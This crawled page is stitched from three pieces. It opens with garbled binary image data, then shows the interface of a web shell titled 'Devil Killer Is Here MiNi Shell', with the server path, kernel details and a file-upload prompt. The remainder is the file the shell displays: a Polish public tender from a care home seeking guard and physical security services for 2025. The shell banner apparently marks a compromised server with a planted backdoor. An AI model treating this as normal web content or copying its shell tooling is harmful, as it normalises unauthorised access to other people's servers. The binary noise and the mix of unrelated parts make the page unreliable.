JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250113/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250113/0002783401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa ochrony fizycznej obiektu, osób, mienia i terenu Domu Pomocy Społecznej os. Słoneczne 49 w Ostrowcu Św. wraz z obsługą portierni i zapewnieniem reakcji patrolu interwencyjnego w 2025 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dom Pomocy Społecznej os. Słoneczne 49. 27-400 Ostrowiec Św.</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">DPS</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 260002240</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">os. Słoneczne 49</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ostrowiec Świętokrzyski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">27-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">41 266-55-53</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@dpsostrowiec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dpsostrowiec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Dom Pomocy Społecznej - opieka społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa ochrony fizycznej obiektu, osób, mienia i terenu Domu Pomocy Społecznej os. Słoneczne 49 w Ostrowcu Św. wraz z obsługą portierni i zapewnieniem reakcji patrolu interwencyjnego w 2025 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bc2325e2-e844-4abe-9d4c-95189ac46f5d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00027834</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-01-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00027132/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługa ochrony fizycznej obiektu, osób, mienia i terenu Domu Pomocy Społecznej os. Słoneczne 49 w Ostrowcu Św. z obsługą portierni i zapewnieniem reakcji patrolu interwencyjneg 01.02.25r - 31.12.25r</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-bc2325e2-e844-4abe-9d4c-95189ac46f5d <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-bc2325e2-e844-4abe-9d4c-95189ac46f5d</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu, z<br/>wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za<br/>pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem<br/>„Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie<br/>odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj<br/>załącznik”). W przypadku załączników, które są zgodnie z ustawą pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie<br/>wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie<br/>zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego<br/>typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz<br/>z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>2. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji”<br/>służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>3. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”..<br/>5. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>6. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>7. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>zamowienia@dpsostrowiec.pl<br/>składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).<br/>8. Postępowanie prowadzone jest w języku polskim.<br/>9. W korespondencji kierowanej do zamawiającego wykonawcy powinni posługiwać się numerem przedmiotowego postępowania.<br/>10. Wykonawca może zwrócić się do zamawiającego z wnioskiem o wyjaśnienie treści SWZ.<br/>11. Zamawiający jest zobowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania<br/>ofert, pod warunkiem że wniosek o wyjaśnienie treści SWZ wpłynął do zamawiającego nie później niż na 4 dni przed upływem<br/>terminu składania odpowiednio ofert.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-bc2325e2-e844-4abe-9d4c-95189ac46f5d</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem danych osobowych jest Dom Pomocy Społecznej, os. Słoneczne 49,<br/>27-400 Ostrowiec Świętokrzyski.<br/>2. Z Administratorem można się skontaktować poprzez pocztę email: sloneczne@domypomocy.pl, telefonicznie nr tel.: 41 266 55 53<br/>lub pisemnie na adres Domu Pomocy Społecznej.<br/>3. Dane osobowe podane przez Panią/Pana w formularzu ofertowym i załącznikach do niego, będą przetwarzane w celu realizacji<br/>postępowania o zamówienie publiczne oraz zawarcia umowy (na podstawie art. 6 ust. 1 lit. b) i lit. c) RODO), a ich administratorem<br/>jest Dom Pomocy Społecznej os. Słoneczne 49, 27-400 Ostrowiec Świętokrzyski. Dane kontaktowe: email:<br/>sekretariat@dpsostrowiec.pl lub telefon: 41 266-55-53. Kontakt do Inspektora Ochrony Danych: iod@arx.net.pl<br/>4. Odbiorcami danych osobowych mogą być osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o przepisy ustawy Pzp oraz podmioty przetwarzające dane na zlecenie Administratora.<br/>5. Dane osobowe będą przechowywane czas określony w przepisach dot. archiwizacji.<br/>6. Przysługuje Pani/Panu prawo do:<br/>- prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>- prawo do sprostowania Pani/Pana danych osobowych, (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie<br/>może naruszać integralności protokołu oraz jego załączników.)<br/>- prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w<br/>art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na<br/>ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.)<br/>- Przysługuje Pani/Panu także prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193<br/>Warszawa, w sytuacji, gdy uzna Pani/Pan, iż przetwarzanie danych osobowych narusza przepisy ogólnego rozporządzenia o<br/>ochronie danych osobowych.<br/>7. Obowiązek podania przez danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania<br/>określonych danych wynikają z przepisów ustawy Pzp.<br/>8. Pani/Pana dane osobowe nie będą podlegać zautomatyzowanemu podejmowaniu decyzji i nie będą profilowane.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.2025.TP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 188612,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa ochrony fizycznej obiektu, osób, mienia i terenu Domu Pomocy Społecznej os. Słoneczne 49 w Ostrowcu Świętokrzyskim wraz z obsługą portierni i zapewnieniem reakcji patrolu interwencyjnego w 2025 r. Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1 do SWZ.<br/>2.	Wykonawca na etapie przygotowywania oferty i wyceny usługi stanowiącej przedmiot zamówienia powinien zapoznać się z dokumentami załączonymi do niniejszej SWZ. W razie wątpliwości Wykonawca przed złożeniem oferty powinien zwrócić się do Zamawiającego z prośbą o wyjaśnienia. Brak zastrzeżeń ze strony Wykonawcy będzie traktowany jako akceptacja dokumentacji opisującej przedmiot zamówienia i jednocześnie stanowiącej podstawę wyceny.<br/>3.	Zamawiający nie dopuszcza możliwości składania ofert częściowych. <br/> Powody niedokonania podziału na części na podst. art. 91 ust. 2 Ustawy Pzp. - zamówienie pod względem technicznym, organizacyjnym oraz ekonomicznym tworzy nierozerwalną całość. Podział zamówienia mógłby spowodować nadmierne trudności techniczne, nadmierny wzrost kosztów wykonania i realizacji zamówienia. Ponadto potrzeba skoordynowania działań różnych Wykonawców realizujących poszczególne części zamówienia mogłaby poważnie zagrozić właściwemu wykonaniu zamówienia.<br/>4.	Zamawiający nie dopuszcza możliwości składania ofert wariantowych oraz w postaci katalogów elektronicznych.<br/>5.	Uchybienia w zakresie wykonywanej usługi, naruszenie w sposób rażący umowy stanowiącej Załącznik Nr 3 do SWZ, będą podstawą do rozwiązania umowy zgodnie z przepisami.<br/>6.	Wykonawca będzie ponosił pełną odpowiedzialność za rzetelne i terminowe wykonanie usługi.<br/>7.	Wykonawca ponosi odpowiedzialność za szkody wyrządzone przez siebie podczas realizacji usługi wynikające bezpośrednio z jego winy.<br/>8.	Zgodnie z art. 95 Ustawy Pzp Zamawiający wymaga, zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie stosunku pracy osób wykonujących czynności w zakresie realizacji zamówienia, polegających na wykonywaniu pracy w sposób określony w art. 22 §1 ustawy z dnia 26 czerwca 1974 roku – Kodeks pracy (Dz. U. z 2023 r. poz. 1465 ze zm.). Obowiązek ten nie obejmuje osób należących do patrolu interwencyjnego.<br/> Przez cały okres trwania umowy Wykonawca lub Podwykonawca zobowiązany jest do przedłożenia do wglądu na żądanie Zamawiającego dokumentów potwierdzających zatrudnienie: umowa o pracę bądź inny dokument (np.: oświadczenie pracownika lub Wykonawcy) potwierdzający zatrudnienie, formy i okresu zatrudnienia w/w osoby lub osób u Wykonawcy lub Podwykonawcy. W przypadku nie zatrudnienia przez Wykonawcę lub podwykonawcę w/w osoby lub osób będzie on zobowiązany do zapłacenia kary umownej w wysokości określonej we Wzorze umowy stanowiącej Załącznik Nr 3 do SWZ. <br/>9.	W przypadku zmian osoby lub osób zatrudnionych Wykonawca lub Podwykonawca każdorazowo musi poinformować o zaistniałej sytuacji Zamawiającego na piśmie.<br/>10. Osoby będą zajmować się dozorem obiektów zgodnie z opisem przedmiotu zamówienia.<br/>11.	Zamawiający wymaga wykonywania przedmiotu zamówienia na najwyższym poziomie jakościowym, w godzinach i składzie osobowym niezbędnym do wykonywania czynności ochrony osób i mienia, wynikających z przedmiotowej SWZ i załączników do SWZ stanowiącą jej integralną część. <br/>12.	Płatność za wykonanie usługi będzie dokonywana w transzach w terminie 30 dni na podstawie prawidłowo wystawionej faktury na zakończenie miesiąca.<br/>13.	Nazwy i kody dotyczące przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień (CPV): <br/>79710000-4 – usługi ochroniarskie<br/>98341140 – 8 usługi dozorowanie </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie przeprowadzona na podstawie poniżej wskazanych kryteriów oceny ofert i ich wag punktowych<br/>Kryteria oceny ofert:<br/>1) Cena (wartość zamówienia brutto) – 60 punktów<br/>2) Czas reakcji grupy interwencyjnej – 40 punktów<br/>3. Przy czym za cenę oferty należy rozumieć cenę brutto wskazaną w Formularzu ofertowym stanowiącym Załączniku Nr 3 SWZ.<br/>4. Zamawiający dokona wyboru najkorzystniejszej oferty za pomocą systemu punktowego.<br/>Ogłoszenie nr 2023/BZP 00524926/01 z dnia 2023-11-30<br/>2023-11-30 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na<br/>podstawie: art. 275 pkt 1 ustawy - Usługi<br/>5. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z zasadami arytmetyki.<br/>6. Jako najkorzystniejsza zostanie uznana oferta, która otrzyma najwyższą liczbę punktów – P, zsumowaną z liczby punktów z<br/>kryterium ceny – C, kryterium czas reakcji grupy interwencyjnej<br/>Wykonawca może uzyskać maksymalnie 100 punków.<br/>P = C+R<br/>7. Podczas badania i oceny ofert zamawiający może żądać od wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym<br/>zaoferowanej ceny.<br/>8. Zamawiający udzieli zamówienia wykonawcy, którego oferta zostanie uznana za najkorzystniejszą</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji patrolu interwencyjnego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale VII SWZ Podstawy wykluczenia, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/><br/>2.	Warunki udziału w postępowaniu dotyczące :<br/>1)	Zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie określa szczegółowego warunku w tym zakresie.<br/><br/>2) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Warunek zostanie spełniony jeżeli Wykonawca posiada uprawnienia do prowadzenia działalności gospodarczej w zakresie ochrony osób fizycznych i mienia. Wykonawca musi posiadać Koncesję na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia zgodnie z Ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz. U. z 2021 r. poz. 1995 z późn. zm.). Wykaże kserokopię koncesji potwierdzonej za zgodność z oryginałem. <br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) przedmiotową koncesją winien wykazać się Wykonawca bezpośrednio realizujące usługi objęte przedmiotem zamówienia. <br/><br/>3)	Sytuacji ekonomicznej lub finansowej: <br/>Warunek zostanie spełniony, jeżeli Wykonawca wykaże się, że posiada ubezpieczenie od OC w zakresie prowadzonej działalności tożsamej z przedmiotem zamówienia na sumę nie mniejszą niż 300 000,00 zł przez cały okres realizacji umowy. W przypadku upływu okresu obowiązywania ubezpieczenia w trakcie realizacji umowy, Wykonawca będzie zobowiązany do niezwłocznego przekazania obowiązującej polisy Zamawiającemu poświadczonej za zgodność z oryginałem kopii wraz z warunkami ubezpieczenia.<br/><br/>4)	Zdolności technicznej lub zawodowej: <br/><br/>a)	Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie – zrealizował, a w przypadku świadczeń okresowych lub ciągłych realizuje bądź realizował co najmniej 1 usługę polegającą na usłudze ochrony fizycznej obiektów, mienia i terenu oraz obsługę portierni, tożsamych z przedmiotem zamówienia oraz wykonywanych w Domach Pomocy Społecznej, Hospicjach, Domach Dziecka, Szpitalach lub innych placówkach realizujących stałą opiekę nad osobami. Jedna usługa rozumiana jest jako jedna zrealizowana w okresie następujących po sobie 12 miesięcy lub realizowana w sposób ciągły przez okres następujących po sobie 12 miesięcy umowy, przy czym wartość jednej usługi w w/w okresie nie może być niższa niż 120 000,00 zł. W przypadku wykazywania umowy zawartej na okres dłuższy niż 12 miesięcy Wykonawca składając ofertę zobowiązany jest wykazać wartość umowy za okres następujących po sobie 12 miesięcy. <br/>Dowodami należycie wykonanej usługi są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy.<br/>Zamawiający wyraża zgodę na wykazanie się umową, która jest w trakcie realizacji pod warunkiem przedstawienia przez Wykonawcę dokumentu potwierdzającego prawidłową jej realizację podpisaną przez stronę Zlecającą usługę. <br/><br/>b)	Warunek zostanie spełniony, jeżeli Wykonawca wykaże się 